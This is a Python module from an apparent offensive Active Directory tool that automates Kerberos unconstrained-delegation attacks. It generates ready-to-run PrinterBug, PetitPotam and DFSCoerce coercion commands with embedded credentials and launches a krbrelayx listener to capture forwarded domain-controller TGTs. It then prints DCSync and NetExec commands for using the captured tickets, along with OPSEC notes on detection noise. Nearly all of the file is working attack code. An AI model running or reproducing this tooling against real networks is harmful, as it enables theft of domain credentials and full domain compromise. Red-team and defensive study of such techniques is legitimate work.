"""
modules/unconstrained.py

Unconstrained Delegation exploitation module.

Attack chain:
  When a machine has TRUSTED_FOR_DELEGATION set, any user who authenticates
  to a service on that machine has their TGT forwarded to it automatically.
  An attacker with code execution or relay position on that machine can
  extract those forwarded TGTs and use them for further attacks.

  Without code execution on the target, the standard remote approach is
  coercion — forcing a privileged machine (typically a DC) to authenticate
  to the unconstrained delegation target using a protocol bug:

  Chain (coercion-based, remote):
    1. Confirm the unconstrained target is reachable and coercible
    2. Set up a TGT capture listener (krbrelayx or Responder)
    3. Trigger authentication from target machine to our listener
       using PrinterBug (SpoolSS), PetitPotam, DFSCoerce, etc.
    4. The authenticating machine's TGT is forwarded to the unconstrained
       target and captured by our listener
    5. Use the captured TGT for DCSync or lateral movement

  DeleGator's role in this chain:
    - Enumerate and verify unconstrained targets (via enumerate module)
    - Verify coercion potential (SpoolSS/PetitPotam port checks)
    - Guide the operator through the coercion setup with exact commands
    - Monitor for and capture TGTs written to a ccache by the listener
    - Validate and display captured tickets with usage instructions

  Note on scope:
    DeleGator does NOT implement coercion directly — coercion tools
    (PrinterBug, PetitPotam.py, DFSCoerce.py) are mature standalone tools
    and reimplementing them would add complexity without value. Instead
    this module generates the exact commands to run and monitors for
    the resulting ccache output.

OPSEC profile:
  Events generated:
    4768 — AS-REQ on the coerced machine (generated by the coerced DC,
            not by DeleGator — this is inherent to the technique)
    4769 — TGS request when using the captured TGT
    7045 — New service installed (if PrinterBug triggers service creation)
  Noise: HIGH
  Notes: Coercion generates significant event noise on the coerced machine.
         The SpoolSS/PrinterBug coercion is the noisiest. PetitPotam
         generates less host-level noise but is more commonly detected
         at the network layer by modern NDR products.
"""

import os
import sys
import time
import subprocess
from dataclasses import dataclass, field
from typing import Optional

from core.auth import AuthContext
from core.ldap import LDAPConnection, OpsecConfig, connect
from core.kerberos import write_ccache, TicketResult
from utils.output import (
    info, success, warning, error, section, divider,
    print_ticket_result, is_json_mode, print_json, critical,
)
from utils.opsec import OpsecCheck, jittered_sleep, print_operation_noise


# ---------------------------------------------------------------------------
# CoercionMethod — supported coercion techniques
# ---------------------------------------------------------------------------

class CoercionMethod:
    SPOOLSS   = "SpoolSS"      # MS-RPRN PrinterBug — port 445
    PETITPOTAM = "PetitPotam"  # MS-EFSR — port 445
    DFSCOERCE = "DFSCoerce"    # MS-DFSNM — port 445
    MANUAL    = "Manual"       # Operator handles coercion externally

    ALL_METHODS = [SPOOLSS, PETITPOTAM, DFSCOERCE]

    # Impacket/standalone tool commands for each method
    COMMANDS = {
        SPOOLSS: (
            "python3 printerbug.py "
            "'{domain}/{username}:{password}@{coerce_target}' {listener_ip}"
        ),
        PETITPOTAM: (
            "python3 PetitPotam.py "
            "-u '{username}' -p '{password}' -d '{domain}' "
            "{listener_ip} {coerce_target}"
        ),
        DFSCOERCE: (
            "python3 dfscoerce.py "
            "-u '{username}' -p '{password}' -d '{domain}' "
            "{listener_ip} {coerce_target}"
        ),
    }


# ---------------------------------------------------------------------------
# UnconstrainedConfig
# ---------------------------------------------------------------------------

@dataclass
class UnconstrainedConfig:
    """
    Configuration for an unconstrained delegation exploitation run.

    dc_ip:           Domain controller IP (for LDAP enumeration)
    domain:          Domain FQDN
    target:          sAMAccountName of the unconstrained delegation machine
                     (the machine we're capturing tickets from)
    coerce_target:   Hostname/IP of the machine to coerce into authenticating
                     to our target. Typically a DC or privileged server.
    listener_ip:     Our IP address — what the coerced machine authenticates to.
                     This is where krbrelayx or Responder should be listening.
    coerce_method:   Which coercion technique to use. Default: SpoolSS.
    ccache_dir:      Directory where the TGT listener writes captured ccaches.
                     DeleGator monitors this directory for new .ccache files.
    watch_timeout:   Seconds to wait for a captured TGT before timing out.
                     Default 60 seconds.
    manual_ccache:   Path to a manually captured ccache to process directly.
                     Use when coercion is performed externally.
    opsec_check:     Prompt before noisy operations.
    delay_ms:        Inter-operation delay in milliseconds.
    jitter_pct:      Jitter percentage for delays.
    output_dir:      Directory for any written output files.
    use_ssl:         Use LDAPS for enumeration queries.
    """
    dc_ip:          str
    domain:         str
    target:         str
    coerce_target:  Optional[str] = None
    listener_ip:    Optional[str] = None
    coerce_method:  str           = CoercionMethod.SPOOLSS
    ccache_dir:     str           = "/tmp"
    watch_timeout:  int           = 60
    manual_ccache:  Optional[str] = None
    opsec_check:    bool          = False
    delay_ms:       int           = 0
    jitter_pct:     int           = 0
    output_dir:     str           = "/tmp"
    use_ssl:        bool          = False


# ---------------------------------------------------------------------------
# Coercion command generation
# ---------------------------------------------------------------------------

def _build_coercion_command(
    method:       str,
    domain:       str,
    username:     str,
    password:     str,
    coerce_target: str,
    listener_ip:  str,
) -> str:
    """
    Build the exact coercion command for the specified method.
    Returns a ready-to-run command string.
    """
    template = CoercionMethod.COMMANDS.get(method, "")
    if not template:
        return f"# Unsupported coercion method: {method}"

    return template.format(
        domain=domain,
        username=username,
        password=password,
        coerce_target=coerce_target,
        listener_ip=listener_ip,
    )


def _build_listener_command(listener_ip: str, output_dir: str) -> str:
    """
    Build the krbrelayx listener command for TGT capture.
    krbrelayx is the standard tool for capturing TGTs forwarded via
    unconstrained delegation.
    """
    return (
        f"python3 krbrelayx.py "
        f"--interface {listener_ip} "
        f"--output-dir {output_dir}"
    )


def _get_auth_string(auth: AuthContext) -> tuple[str, str]:
    """
    Extract username and credential string from AuthContext for
    embedding in coercion commands.
    Returns (username, credential_string).
    """
    username = auth.username

    if auth.auth_method.name == "PASSWORD":
        return username, auth.password or ""
    elif auth.auth_method.name == "HASH":
        return username, f"-hashes {auth.lm_hash}:{auth.nt_hash}"
    elif auth.auth_method.name == "CCACHE":
        return username, f"-k -no-pass"
    else:
        return username, ""


# ---------------------------------------------------------------------------
# TGT capture monitoring
# ---------------------------------------------------------------------------

def _watch_for_ccache(
    watch_dir:   str,
    timeout_sec: int,
    existing:    set[str],
) -> Optional[str]:
    """
    Monitor a directory for new .ccache files written by a listener.
    Returns the path to the first new ccache found, or None on timeout.

    Polls every 2 seconds. The existing set contains ccache filenames
    already present before monitoring started, so we only return
    genuinely new captures.
    """
    info(f"Monitoring {watch_dir} for captured TGTs (timeout: {timeout_sec}s)...")
    deadline = time.time() + timeout_sec

    while time.time() < deadline:
        try:
            current = {
                f for f in os.listdir(watch_dir)
                if f.endswith(".ccache")
            }
        except OSError:
            time.sleep(2)
            continue

        new_files = current - existing
        if new_files:
            # Return the most recently modified new ccache
            newest = max(
                new_files,
                key=lambda f: os.path.getmtime(os.path.join(watch_dir, f))
            )
            return os.path.join(watch_dir, newest)

        remaining = int(deadline - time.time())
        if remaining % 10 == 0 and remaining > 0:
            info(f"  Still waiting... {remaining}s remaining")

        time.sleep(2)

    return None


def _validate_captured_ccache(ccache_path: str) -> Optional[dict]:
    """
    Load and validate a captured ccache.
    Returns basic ticket info dict or None if the ccache is invalid/expired.
    """
    from impacket.krb5.ccache import CCache

    try:
        ccache = CCache.loadFile(ccache_path)
    except Exception as e:
        warning(f"Cannot parse captured ccache '{ccache_path}': {e}")
        return None

    if not ccache.credentials:
        warning(f"Captured ccache '{ccache_path}' contains no credentials")
        return None

    cred = ccache.credentials[0]

    try:
        client = ccache.principal.components[0].decode()
    except Exception:
        client = "unknown"

    try:
        server = cred["server"].prettyPrint()
    except Exception:
        server = "unknown"

    return {
        "client":     client,
        "server":     server,
        "ccache_path": ccache_path,
    }


# ---------------------------------------------------------------------------
# Guidance printers
# ---------------------------------------------------------------------------

def _print_setup_guide(
    config:    UnconstrainedConfig,
    auth:      AuthContext,
) -> None:
    """
    Print step-by-step setup instructions for the coercion attack.
    This is the primary output of the unconstrained module when
    running in guidance mode (no --manual-ccache supplied).
    """
    username, cred_str = _get_auth_string(auth)

    listener_cmd  = _build_listener_command(
        config.listener_ip or "<YOUR_IP>",
        config.ccache_dir,
    )

    coerce_cmd = _build_coercion_command(
        method=config.coerce_method,
        domain=config.domain,
        username=username,
        password=cred_str,
        coerce_target=config.coerce_target or "<COERCE_TARGET>",
        listener_ip=config.listener_ip or "<YOUR_IP>",
    )

    divider()
    print()
    print(f"  \033[36mUnconstrained Delegation Attack Setup\033[0m")
    print(f"  \033[90mTarget machine  : {config.target}\033[0m")
    print(f"  \033[90mCoerce target   : {config.coerce_target or 'not specified'}\033[0m")
    print(f"  \033[90mCoerce method   : {config.coerce_method}\033[0m")
    print(f"  \033[90mListener IP     : {config.listener_ip or 'not specified'}\033[0m")
    print()

    print(f"  \033[36m# Step 1 — Start the TGT capture listener\033[0m")
    print(f"  \033[1m{listener_cmd}\033[0m")
    print()

    print(f"  \033[36m# Step 2 — Trigger coercion ({config.coerce_method})\033[0m")
    print(f"  \033[1m{coerce_cmd}\033[0m")
    print()

    print(f"  \033[36m# Step 3 — Wait for captured TGT in {config.ccache_dir}\033[0m")
    print(f"  \033[90m  DeleGator will monitor automatically if --watch is set\033[0m")
    print(f"  \033[90m  Or process manually: delegator.py exploit --type unconstrained\033[0m")
    print(f"  \033[90m    --manual-ccache /path/to/captured.ccache\033[0m")
    print()

    # Additional coercion methods
    print(f"  \033[36m# Alternative coercion methods\033[0m")
    for method in CoercionMethod.ALL_METHODS:
        if method == config.coerce_method:
            continue
        alt_cmd = _build_coercion_command(
            method=method,
            domain=config.domain,
            username=username,
            password=cred_str,
            coerce_target=config.coerce_target or "<COERCE_TARGET>",
            listener_ip=config.listener_ip or "<YOUR_IP>",
        )
        print(f"  \033[90m  [{method}] {alt_cmd}\033[0m")

    print()
    divider()


def _print_captured_ticket(ticket_info: dict, config: UnconstrainedConfig) -> None:
    """
    Print usage instructions for a captured TGT.
    """
    ccache_path = ticket_info["ccache_path"]
    client      = ticket_info["client"]

    divider()
    print(f"  \033[32m\033[1m[+] TGT captured successfully\033[0m")
    divider()
    print()
    print(f"  \033[36mCaptured principal : \033[0m\033[1m{client}@{config.domain.upper()}\033[0m")
    print(f"  \033[36mccache path        : \033[0m\033[32m{ccache_path}\033[0m")
    print()

    print(f"  \033[36m# Export the ticket\033[0m")
    print(f"  \033[1mexport KRB5CCNAME={ccache_path}\033[0m")
    print()

    print(f"  \033[36m# DCSync with the captured TGT\033[0m")
    dc_host = config.coerce_target or config.dc_ip
    print(f"  \033[1msecretsdump.py -k -no-pass {client}@{dc_host}\033[0m")
    print()

    print(f"  \033[36m# Or use with NetExec\033[0m")
    print(f"  \033[1mnetexec smb {dc_host} --use-kcache\033[0m")
    print()

    print(f"  \033[36m# Verify ticket with klist\033[0m")
    print(f"  \033[1mklist -c {ccache_path}\033[0m")
    print()
    divider()


# ---------------------------------------------------------------------------
# Main unconstrained delegation entry point
# ---------------------------------------------------------------------------

def run_unconstrained(
    auth:   AuthContext,
    config: UnconstrainedConfig,
) -> Optional[dict]:
    """
    Main entry point for the unconstrained delegation exploitation module.
    Called by delegator.py when `exploit --type unconstrained` is used.

    Two modes:
      1. Guidance mode (default) — prints coercion setup instructions
         and optionally monitors for captured TGTs
      2. Manual mode (--manual-ccache) — processes an already-captured
         ccache and prints usage instructions

    Returns a dict with ticket info on success, None on failure.
    """
    opsec = OpsecCheck(enabled=config.opsec_check)

    section("Unconstrained Delegation Exploitation")
    info(f"Target machine   : {config.target}")
    info(f"Domain           : {config.domain}")

    # Manual mode — process an existing ccache directly
    if config.manual_ccache:
        info(f"Processing captured ccache: {config.manual_ccache}")

        if not os.path.isfile(config.manual_ccache):
            error(f"ccache file not found: {config.manual_ccache}")
            return None

        ticket_info = _validate_captured_ccache(config.manual_ccache)
        if not ticket_info:
            return None

        success(f"Valid TGT found for: {ticket_info['client']}")

        if not is_json_mode():
            _print_captured_ticket(ticket_info, config)
            print_operation_noise("tgt_request")
        else:
            print_json({
                "type":       "unconstrained",
                "mode":       "manual",
                "client":     ticket_info["client"],
                "ccache_path": ticket_info["ccache_path"],
                "export_command": f"export KRB5CCNAME={ticket_info['ccache_path']}",
                "dcsync_cmd": (
                    f"secretsdump.py -k -no-pass "
                    f"{ticket_info['client']}@{config.coerce_target or config.dc_ip}"
                ),
            })

        return ticket_info

    # Guidance mode — print setup and optionally watch for captures
    if not config.coerce_target:
        warning(
            "No coerce target specified. Printing guidance with placeholder values.\n"
            "  Use --coerce-target <DC_HOSTNAME> to specify the machine to coerce."
        )

    if not config.listener_ip:
        warning(
            "No listener IP specified.\n"
            "  Use --listener-ip <YOUR_IP> to specify where the coercion listener runs."
        )

    # Check OPSEC before proceeding
    if not opsec.check("rbcd_write"):
        return None

    if not is_json_mode():
        _print_setup_guide(config, auth)

    # Optionally watch for captured ccaches
    # Only enter watch mode if both coerce target and listener IP are set
    if config.coerce_target and config.listener_ip:
        info(f"Watch mode active — monitoring {config.ccache_dir} for captures...")

        # Snapshot existing ccaches before we start
        try:
            existing = {
                f for f in os.listdir(config.ccache_dir)
                if f.endswith(".ccache")
            }
        except OSError:
            existing = set()

        captured = _watch_for_ccache(
            config.ccache_dir,
            config.watch_timeout,
            existing,
        )

        if not captured:
            warning(
                f"No ccache captured within {config.watch_timeout}s timeout.\n"
                "  Verify the coercion succeeded and the listener is writing "
                f"ccaches to {config.ccache_dir}.\n"
                "  Process manually with: --manual-ccache /path/to/captured.ccache"
            )
            return None

        success(f"Captured ccache: {captured}")
        ticket_info = _validate_captured_ccache(captured)

        if not ticket_info:
            return None

        if not is_json_mode():
            _print_captured_ticket(ticket_info, config)
        else:
            print_json({
                "type":        "unconstrained",
                "mode":        "watched",
                "client":      ticket_info["client"],
                "ccache_path": ticket_info["ccache_path"],
                "export_command": f"export KRB5CCNAME={ticket_info['ccache_path']}",
            })

        return ticket_info

    # Guidance only — no watch mode
    info(
        "Guidance printed. Run coercion and listener manually, then process "
        "the captured ccache with:\n"
        f"  delegator.py exploit --type unconstrained "
        f"--target {config.target} "
        f"--manual-ccache /path/to/captured.ccache "
        f"-d {config.domain} -u <user> -p <pass>"
    )

    return None
